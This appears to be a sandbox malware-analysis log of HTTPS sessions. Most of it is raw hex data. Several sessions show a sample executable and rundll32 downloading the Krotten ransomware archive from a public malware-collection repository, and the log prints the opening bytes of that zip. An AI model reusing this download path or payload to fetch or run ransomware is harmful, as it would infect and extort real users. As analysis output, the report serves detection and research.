                                                                                                                                                2022-09-29 12:48:37 UTC1314INData Raw: 15 f7 15 13 cc b1 8e 0e af 76 fe ae df 0d c3 2e 25 9c 13 8f 01 6a 10 ed 8e 3a 98 53 55 31 df e6 39 9a 90 25 8d 2f 24 68 04 d7 5b 05 8c f6 70 ad d5 17 58 f5 50 56 67 59 37 28 4f e9 c2 fc 96 a5 70 03 8f 5c f1 e9 7f f3 56 57 c8 55 a0 2b 85 a5 16 c2 1e 47 d1 24 e0 84 ab 24 4e f0 1a a1 17 2a 98 4c 00 7d 44 51 7c d0 45 08 77 bb c9 b7 50 9e 3a 0f f3 a0 91 09 76 91 b3 b3 74 92 80 80 7e 0f 7c 5c 54 3e 13 47 76 73 08 24 47 80 cc 00 ca 0c 95 89 2e 39 0b 86 c8 d5 c9 1d 43 8e 69 ea 96 b6 2c 43 4f 8c 8f 61 62 f5 c1 66 8e cd 56 84 de 69 45 ef 93 77 33 58 fb 90 24 3c b2 a2 a3 48 77 b8 30 77 42 87 49 ee 6a a9 44 4c 8f 2e 69 e5 fe 81 84 59 a1 a2 32 42 f1 4e 4d 47 e9 3b 29 01 6c e7 c5 28 43 a8 c9 cd b7 18 16 59 7f a5 bc 8b 7b ad b9 99 f4 53 0f cb df be 4e ef 47 3b fa b1 02
                                                                                                                                                Data Ascii: v.%j:SU19%/$h[pXPVgY7(Op\VWU+G$$N*L}DQ|EwP:vt~|\T>Gvs$G.9Ci,COabfViEw3X$<Hw0wBIjDL.iY2BNMG;)l(CY{SNG;
                                                                                                                                                2022-09-29 12:48:37 UTC1315INData Raw: 6a 25 10 c5 11 0e e5 8c aa fd 5c e8 14 d1 80 96 4e a7 2b 88 26 97 6b 61 62 0b 07 d0 cf 43 35 d3 e3 28 1d 84 00 62 39 8f 12 b5 f1 13 0e 83 c5 6c 65 95 9c 6f 56 29 2a c1 5c 67 a3 81 61 07 fb 85 51 15 b7 1d 2c b6 82 f4 98 af db 09 98 bf 51 85 ff 85 5a 79 9f b4 f4 2b 52 6c f6 48 da 56 1b 05 ea 9f 7b 17 40 05 f7 29 34 65 43 26 b3 86 72 8e 07 9b 70 b3 f3 1a 48 f2 66 e9 f1 d3 00 51 db 2f d1 cf d3 ed d4 5d fb 3e b6 09 88 c5 c2 e2 88 dd e1 a0 5f 05 32 07 b9 c2 ff ad a9 e5 fe fb ed 2f fb 79 26 aa 8c a4 57 f0 a9 67 8b f8 2b 89 36 4b 4c 78 2b 28 60 8e 7f 73 ee 24 9d 9d 33 ac ea 12 31 e3 b6 14 59 7e 7c 19 da 75 25 98 75 82 0e 3f e7 23 8d fc eb 96 cd 72 9a ca 4a 04 82 de ec 4f ad 49 45 47 11 d3 c9 13 2d 32 52 e2 72 e6 89 19 ee e7 0e 4f df 0a 47 c3 e3 78 39 d1 48 3c 4a
                                                                                                                                                Data Ascii: j%\N+&kabC5(b9leoV)*\gaQ,QZy+RlHV{@)4eC&rpHfQ/]>_2/y&Wg+6KLx+(`s$31Y~|u%u?#rJOIEG-2RrOGx9H<J
                                                                                                                                                2022-09-29 12:48:37 UTC1316INData Raw: 8a f3 42 b1 6c cc 06 b2 8b 70 4b 60 4c 44 f1 f2 16 7c 9a de 05 3e fb 45 ad df 8c 17 57 a6 29 e9 b7 d3 5f fe 74 e3 11 5b 19 0a aa 23 b8 99 a4 24 50 2d 04 97 14 96 88 da 8d ff f5 80 57 54 72 0d 6e 6d 77 31 eb ab 03 b6 24 67 39 7e 85 d2 4c a4 ae 63 77 1a 4a 7e 1d f3 7f a7 fb 3d 27 eb 86 7b d0 44 28 90 15 73 bf a6 ce 51 3e 75 25 8a 82 d0 71 25 b5 c2 08 69 66 9f b8 9a da 5b 22 c5 fe 17 98 a2 26 cd 31 18 f8 c6 1b 03 d3 82 5c 2a 9d c1 2d b8 d3 14 18 ee 3e 72 ee 1b 08 2f d8 d4 34 ae 21 9f 20 ed 5e 97 bc e7 76 6d b7 8d 70 a0 9a 84 34 19 d5 51 c7 bc 38 f0 97 41 6e ac 3e b8 1f 9e 96 b2 9a 86 d7 c7 b4 01 21 96 2c f8 a5 eb f8 4a ad 48 bb 88 ab 97 a5 f5 f6 83 29 2f 95 1d 0a 85 f9 97 33 d0 52 d9 b8 a1 be 3b 7b 0f fd ab 3b 4a 24 ab 58 10 d7 bb cc 8f 32 4a 5c d6 54 9f 68
                                                                                                                                                Data Ascii: BlpK`LD|>EW)_t[#$P-WTrnmw1$g9~LcwJ~='{D(sQ>u%q%if["&1\*->r/4! ^vmp4Q8An>!,JH)/3R;{;J$X2J\Th
                                                                                                                                                2022-09-29 12:48:37 UTC1318INData Raw: ae d2 f4 0e 30 ed b6 48 d5 9f 86 c3 30 ef 5a d6 0b ea a9 67 bd 36 6e 66 fa d2 33 19 85 65 22 7a 16 00 25 7b ea 4e 69 ed eb 77 0a 5c 5b 91 a3 2f 25 fc 44 f8 d7 54 01 d3 9b 2f 1b 55 1e 51 dc 7f a6 cf a8 c6 5e 0a 8d 22 1e a4 73 13 60 d5 d5 d5 9a 96 b0 3e 70 0b 38 15 0b 2d 26 ac f8 35 a5 60 69 61 72 33 b4 01 19 9e 6d 2d 26 21 6d e1 90 6b 4c 90 3b 7d d6 92 9f fa 48 84 8e 6e bb 81 72 01 8b b0 07 73 bc fa 1f bf 50 4e d9 cd d0 99 0b dd 01 78 f1 fb db 4f 97 fc 4e 28 ba f2 96 e2 00 4f 7e a5 8b 0b 38 8f c4 5d 1e 76 d7 1c a3 e6 57 0d bf 69 8b 20 18 45 c4 79 9c 5c 6f 2f b1 9d 9e ac 2e 77 e9 12 bf d2 90 c5 47 af f5 24 18 7d 8e a8 2a 53 dd 1d 5a 54 71 42 74 f4 63 3a 52 c0 a9 53 69 47 b0 18 6d c6 14 41 39 64 4a 54 2e 90 1d be c9 a3 0a b7 c4 ef 23 43 e7 60 f0 b4 7c f1 dd
                                                                                                                                                Data Ascii: 0H0Zg6nf3e"z%{Niw\[/%DT/UQ^"s`>p8-&5`iar3m-&!mkL;}HnrsPNxON(O~8]vWi Ey\o/.wG$}*SZTqBtc:RSiGmA9dJT.#C`|
                                                                                                                                                2022-09-29 12:48:37 UTC1319INData Raw: 66 44 a2 79 96 31 00 2b 4a 38 3c b5 b7 00 1a 67 14 ad 5d 09 b2 98 03 0b b9 26 68 b0 fc 94 c8 01 2b 1e ca ba 1b 1d ee 73 31 52 8c 2e 6c 1d 78 dc 26 4d c7 a1 f3 fe 15 05 04 8f f1 bf a6 d0 cb f8 17 f6 e0 2c 50 c5 1b 09 22 12 f1 49 04 0a 0d 15 f7 01 e6 da bf d8 9a db fc cb 99 6f 87 bc a4 56 21 0f 60 a6 21 f9 ed 0c 0d 79 06 90 52 27 f2 26 20 5f 94 6e ba c1 58 89 d7 5e 2f a4 e9 40 83 8d 87 70 28 41 00 1f 75 01 24 95 1a ff 45 a7 a9 01 dc d7 9a 63 1d 9c e9 c7 e5 a8 c2 b7 ba 44 be aa 72 47 d0 0d b9 1b d5 b6 a0 1e 10 a2 bc 97 4b 34 b8 27 7e dd 55 c9 70 86 04 fd 24 57 b7 60 47 10 c7 d3 b0 24 e5 c4 b2 3d 72 d0 0e fd c6 72 29 0e d2 23 1f d5 d1 79 38 37 16 4e 25 64 4c 6f 17 13 c9 d3 8d 66 32 14 55 90 fa 39 15 a8 41 34 10 33 7e 45 f7 ac b4 56 7c 73 06 a7 35 a9 64 f8 ab
                                                                                                                                                Data Ascii: fDy1+J8<g]&h+s1R.lx&M,P"IoV!`!yR'& _nX^/@p(Au$EcDrGK4'~Up$W`G$=rr)#y87N%dLof2U9A43~EV|s5d
                                                                                                                                                2022-09-29 12:48:37 UTC1320INData Raw: 60 92 32 f9 12 c5 c6 1b d6 c2 7a 89 8b 3c 6b 2e 41 9a e6 17 8b 34 3b 3d f8 cb 49 02 b0 c1 94 ba 68 aa d1 38 4c 0e e6 13 0e c3 96 12 de 57 ab c9 62 e2 ad 42 4e 37 d8 76 17 cc 6a cc 37 5c 2a fe c9 67 eb f3 77 93 b4 f3 d0 16 1f af 52 8e d9 ec f8 96 40 94 a5 38 05 6e a8 68 15 ca fa 19 1c dc df 37 d1 92 1d ee 0d ba 78 8f b1 e2 73 73 ce 92 ef 56 5d 7f 98 0e d7 c0 39 a0 67 f2 2d 00 0c 05 66 4a 4d c4 51 1e bb c6 ef 5c 4f 4d ae b4 5c 4e a8 05 64 72 b3 fd 67 76 e6 1e 03 45 3d 1d 76 a2 b2 e6 38 88 f0 70 b0 85 19 b6 84 c2 84 bd bc 87 f1 96 ff 5f f9 93 fd e0 06 23 a1 ae 58 7d d3 8d 80 c0 f5 99 5a ce bd 01 6c 28 dd 82 8d 25 24 65 f9 10 af 8d 65 d5 23 2c f8 df 6c 3a a3 98 b2 08 3b 60 3a 1e 42 85 af a3 d0 4f 6a 97 03 da eb 3d 9b 3e 9d 3c 0b 4a f0 cc cc 5e 0f 6e 56 5d 52
                                                                                                                                                Data Ascii: `2z<k.A4;=Ih8LWbBN7vj7\*gwR@8nh7xssV]9g-fJMQ\OM\NdrgvE=v8p_#X}Zl(%$ee#,l:;`:BOj=><J^nV]R
                                                                                                                                                2022-09-29 12:48:37 UTC1322INData Raw: 24 cf a9 8c 1a 8a 76 3b 74 fc 87 46 48 22 e2 4d e5 26 ca 27 64 ec db 67 f1 c6 b8 17 44 f9 87 b4 df 45 72 1c 06 e2 03 75 b9 ee 15 e3 e3 b8 8c 1a 42 51 dc 28 02 49 98 95 54 57 04 fb 71 d3 62 84 a2 9e 68 b9 e1 dd 37 98 54 16 2c 6b cc 34 ad f8 c6 84 73 c0 38 3c c1 5e 91 f2 08 a2 f1 14 97 d4 6b 85 c5 8f 77 45 d9 19 5d 34 d7 3a 99 06 d4 26 66 29 fb 92 f1 33 21 0b 00 dd a3 36 30 41 e0 94 fa 3e d5 df a4 8b bf c2 69 e6 21 21 86 e8 26 84 be 86 04 9a 73 47 d8 9c 80 cf da 1b f9 c6 0c f4 2e 76 30 46 d5 77 ef 64 f0 5d d8 03 14 de 39 d3 d6 b0 57 16 b3 8c b8 64 fd b0 0d f1 79 39 b9 c4 a9 8a 81 ec 89 00 c2 50 b8 be e8 f6 ad a3 2c 85 30 e3 a4 6c 38 c7 f2 76 e0 9a 37 21 3f da 63 66 27 57 11 47 01 43 06 aa 61 20 92 16 6e 1a 2e 6c c5 d5 df 99 8d 17 d9 19 4c 74 c0 30 26 73 f8
                                                                                                                                                Data Ascii: $v;tFH"M&'dgDEruBQ(ITWqbh7T,k4s8<^kwE]4:&f)3!60A>i!!&sG.v0Fwd]9Wdy9P,0l8v7!?cf'WGCa n.lLt0&s
                                                                                                                                                2022-09-29 12:48:37 UTC1323INData Raw: 2d 47 6f fd 90 bf c9 d6 12 92 da c4 9b 49 0f 34 97 e0 c5 29 00 0d 61 3a 10 d9 ae 38 d5 c0 83 21 94 c3 9f 2c a1 ff d6 47 0e ae f5 ab ca 79 b7 48 fe 4b 80 e7 5f 1a 3f b5 bb 27 25 c5 a8 39 e8 93 87 b8 e6 83 40 42 fd 77 ed 36 a4 87 b0 28 c7 8c 43 ea 21 a2 4b f9 01 50 f8 ac 2c 18 f3 7e 62 ba 33 1c 51 ed 93 bb cd 4d d9 30 1f fd 33 62 4a 36 00 06 83 ff 76 17 be e0 3b 75 b0 64 2b 1a d3 52 67 82 a4 0c a1 43 16 fe 47 f6 83 e6 7f 01 d3 ae 1d c9 4f 57 32 9f 16 22 63 29 1b e8 b7 9b 72 71 60 e2 a9 85 e8 4b 0c c6 05 95 d2 92 fa 17 b7 49 b5 3d ed 14 80 33 34 9b 48 3d 27 6a 24 98 f0 b6 73 9b bd f8 ed 5d 3a 81 48 51 c1 16 5a 1f 53 6f 94 ab 2d dd 1a 70 8d 00 69 b3 61 bc a9 4c 14 74 f9 19 e6 20 07 f5 f4 6c 62 74 22 1a f2 25 d9 f5 7d dc 95 63 a1 88 87 f9 2b 76 7d 60 1d f6 21
                                                                                                                                                Data Ascii: -GoI4)a:8!,GyHK_?'%9@Bw6(C!KP,~b3QM03bJ6v;ud+RgCGOW2"c)rq`KI=34H='j$s]:HQZSo-piaLt lbt"%}c+v}`!
                                                                                                                                                2022-09-29 12:48:37 UTC1324INData Raw: 4f 06 47 3e 3e d0 18 ff f9 6c 1a 22 3d 83 3d 1b d0 bd e4 3f de 4c a8 47 e6 ba ab 08 c0 56 bf f4 ef 65 f1 24 06 d2 9c 80 f8 a1 27 a1 d1 8f c5 db 16 de 68 e7 1f 5a 98 d4 c8 7d da e3 15 42 cd a4 fe c2 4a 6b c0 48 18 38 79 6a f1 40 15 46 1d ca 55 ae ed c6 0e 62 02 65 f1 c5 27 00 4b 33 ad 0f 9f a5 2a 48 36 e3 68 50 b9 f0 1c 4f a1 74 7a 5c 31 f9 8a 13 c9 8f df 2e 2d ff 36 7b 55 54 eb 4a 8c f0 f6 0f c0 04 ed ae f7 11 69 bf 00 bd 2a 4f 08 2e 2b ff 1e fa dd 8c bc df ad da 98 2d 1a af 8d dc 2d 5f 39 4c 96 13 67 c8 bf 7f 33 15 eb 83 b4 75 85 80 b4 96 bf fd 9a d4 4c c1 15 3a 74 ac 17 ac 3e 83 97 88 de ec 73 86 8e 2a ee 31 af ee e4 9e 43 f4 7c 9f 00 0a 2b 19 f7 d5 12 6d 15 16 4b fb 4f 62 8d e9 21 49 21 61 2a 06 99 d6 b0 cf 98 66 8d b6 d3 c8 e6 52 ee 71 16 40 c3 ab 46
                                                                                                                                                Data Ascii: OG>>l"==?LGVe$'hZ}BJkH8yj@FUbe'K3*H6hPOtz\1.-6{UTJi*O.+--_9Lg3uL:t>s*1C|+mKOb!I!a*fRq@F
                                                                                                                                                2022-09-29 12:48:37 UTC1326INData Raw: 32 99 97 dc 51 88 41 49 9d 05 6a 28 ab b9 c8 f8 c8 d7 b3 73 86 e3 4e 9d ce f7 49 80 93 16 e3 1c 2a 2c dd f1 b3 73 eb 9c fc 64 c6 c4 d8 84 cc 43 13 f3 ca 11 fa ab b6 f2 42 32 a6 47 24 15 4d d8 2b 2f fd 5c 26 2c b6 c0 3a 91 ba 4b 72 f2 34 18 23 c3 69 4d 46 3a 16 69 a5 6c 5a 2e 1a dd e5 f3 76 d4 6c 2b 5c 9d f7 47 48 22 bc a0 44 a1 2f b7 87 fe 73 35 51 b5 e8 f0 2e 02 bc b6 5d bc f8 d9 21 37 97 ed 15 2d 97 d7 af 69 38 39 da 5e 4b e7 55 89 56 de fe 6b fa a1 cb f0 35 55 88 44 79 bd 3d af dd f9 1d 89 94 37 be 9d b3 4b 1e 85 dc 0b a1 74 ce 3d fe 07 c6 fa 07 44 d8 47 34 c7 eb 12 19 3f 9c 06 9f aa 6b 14 2b f5 23 97 99 e9 64 c2 74 f8 1c 02 1c 5b d1 2f 85 69 c7 ec 29 a8 fe 6c 65 92 31 f6 fd 76 1a cb ce 2b f0 d7 5f 94 ed da 22 59 fd c7 2d e2 4d b9 fc 75 1c 76 0e 96 42
                                                                                                                                                Data Ascii: 2QAIj(sNI*,sdCB2G$M+/\&,:Kr4#iMF:ilZ.vl+\GH"D/s5Q.]!7-i89^KUVk5UDy=7Kt=DG4?k+#dt[/i)le1v+_"Y-MuvB
                                                                                                                                                2022-09-29 12:48:37 UTC1327INData Raw: ef 6c a1 54 e6 90 d9 b7 57 3e a4 09 d0 d6 2f e9 7b 42 ff 1d df 26 c9 08 ba 22 6f 7e 72 86 36 1b 2c cf 74 50 49 ed 36 9d f5 ac 01 61 88 a6 38 bc 81 81 be 2e d9 e2 62 ea 81 fe 75 a9 28 74 77 ce a8 72 d5 04 dc 9d e3 24 d8 b1 e4 28 84 57 0c c6 6f 1c 88 f5 08 91 4f 25 16 b8 1c c2 f5 e8 ed b8 f7 23 85 18 a4 73 9f 6b 62 e3 ab ab fe 26 2e fe a9 68 aa 33 53 cc 0a 79 87 20 0a 16 3c ca 61 2c fd d7 6d eb 07 e4 3b d2 01 4e 39 a9 94 2a c5 7b 09 ad d6 1f c8 5b 6f 59 3f 1b 82 80 c8 b6 e8 d7 dd 66 07 b4 38 a9 f8 35 90 73 67 73 f3 6b f2 f6 a6 36 83 e5 ec 9b bc a6 0e 57 b0 c0 f1 fd c1 d2 e5 28 8c 9c 46 a5 f7 21 f5 65 52 99 7e f3 e8 49 e7 d8 1a 0d 95 4b 7a aa a3 01 f2 ec e7 3a 6c 76 4f 59 0d da 24 f9 7a d4 dd 77 24 ed 5e 88 80 30 f7 bb a7 79 b5 bf 70 66 a7 cf d3 b4 f7 0b c6
                                                                                                                                                Data Ascii: lTW>/{B&"o~r6,tPI6a8.bu(twr$(WoO%#skb&.h3Sy <a,m;N9*{[oY?f85sgsk6W(F!eR~IKz:lvOY$zw$^0ypf
                                                                                                                                                2022-09-29 12:48:37 UTC1328INData Raw: 73 e0 c0 34 a5 0c 90 69 48 cc 24 58 1f 70 b3 c8 75 1a d9 ba fc a4 ca 79 be 92 93 29 cc 13 a9 fc ea 16 8b 44 9a d0 d1 28 5f 26 f3 24 db 9f e7 51 40 94 ce e5 f5 5f 37 68 87 e3 89 e1 f3 37 d1 a8 d5 30 b3 3f 70 06 ff 4a b6 4e d9 37 0e 1a 82 3c 5f 1f 4c 47 ba 81 35 0d 76 f5 39 75 6b 36 d9 80 8a 57 85 98 e9 ab 51 fb 0c ab 66 97 28 e3 2f 49 d1 6d 67 7d 37 ff f3 31 1c 5f f6 66 c6 22 c5 52 83 35 c2 81 3a 40 85 f2 b5 b6 22 54 4e 77 61 c8 e7 de 0e 11 d8 a7 f7 da a1 80 cd f8 3c 39 89 7b 95 0c 3e 35 63 fc ff 7d 15 17 b7 68 48 cb b8 8e 2c 64 ce 5a 13 93 26 83 1d 47 b4 99 94 85 cc 1f 88 bc 75 b2 8c bd 9f 67 ab e3 2e d0 55 4d 79 86 63 0b f8 ee db d4 12 13 6f a3 c3 c1 cd 96 4d 99 fd c1 fe f5 60 c4 c4 40 3d 88 c4 57 d4 97 ad 92 6c 96 10 b1 90 34 88 f0 94 d7 db b1 19 3c 86
                                                                                                                                                Data Ascii: s4iH$Xpuy)D(_&$Q@_7h70?pJN7<_LG5v9uk6WQf(/Img}71_f"R5:@"TNwa<9{>5c}hH,dZ&Gug.UMycoM`@=Wl4<
                                                                                                                                                2022-09-29 12:48:37 UTC1330INData Raw: 68 8d 62 1d b4 17 3c 66 f1 37 a1 f7 78 79 5c 1d 4f 0b e7 fb 63 e3 cc 87 9c 67 e6 d4 e6 95 ac ac 3b 0a ff 55 0c b2 bf fc 45 f6 b9 2e f2 51 68 cd d2 2d 71 22 4d 67 79 e6 d2 20 03 e9 86 23 95 41 83 9b e1 84 66 df cc 97 ff 90 2d 8c c4 00 54 3e 00 03 66 68 03 89 5c ae 1d 72 31 aa f6 e9 38 e7 b5 1a d4 63 39 71 bb 17 84 55 ba 8f 6b f3 82 45 77 c0 22 d8 c6 cb 1c ba 04 2d 48 0c 72 e2 e4 77 04 25 b2 d1 55 4e 97 21 19 2f ef 84 5e be fe 91 7c 9b 89 73 1d 15 71 ba 34 ab 50 8c 99 24 18 9f 28 b9 1d 4e 51 2b 1a d7 3e 02 f2 f4 bd 8e 37 b4 fe 66 28 81 b7 a2 de f3 25 ee 00 dc 95 13 83 35 ad 90 b8 08 ce ac 75 33 e3 59 83 f5 29 99 e3 b8 c5 18 36 30 b7 89 21 05 05 4b 85 af 4a 05 b0 1a f0 66 72 8b 31 2f 30 60 9b ee 74 f9 68 70 15 44 13 08 81 c4 26 44 fa 13 f7 82 dd 1b 87 3c 31
                                                                                                                                                Data Ascii: hb<f7xy\Ocg;UE.Qh-q"Mgy #Af-T>fh\r18c9qUkEw"-Hrw%UN!/^|sq4P$(NQ+>7f(%5u3Y)60!KJfr1/0`thpD&D<1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                28192.168.2.349698140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:39 UTC1331OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                29140.82.121.4443192.168.2.349698C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:39 UTC1331INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:39 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:39 UTC1331INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.34968423.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:09 UTC179OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                2022-09-29 12:48:10 UTC179INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                Cache-Control: public, max-age=226106
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:10 GMT
                                                                                                                                                Content-Length: 55
                                                                                                                                                Connection: close
                                                                                                                                                X-CID: 2
                                                                                                                                                2022-09-29 12:48:10 UTC180INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                30192.168.2.349699185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:39 UTC1333OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                31185.199.108.133443192.168.2.349699C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:39 UTC1333INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 26359
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:39 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6946-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455720.802428,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: d7e8d18dd8aeb93cd09d98bff2ed1bb2186d5e2d
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:39 GMT
                                                                                                                                                Source-Age: 248
                                                                                                                                                2022-09-29 12:48:39 UTC1334INData Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0
                                                                                                                                                Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
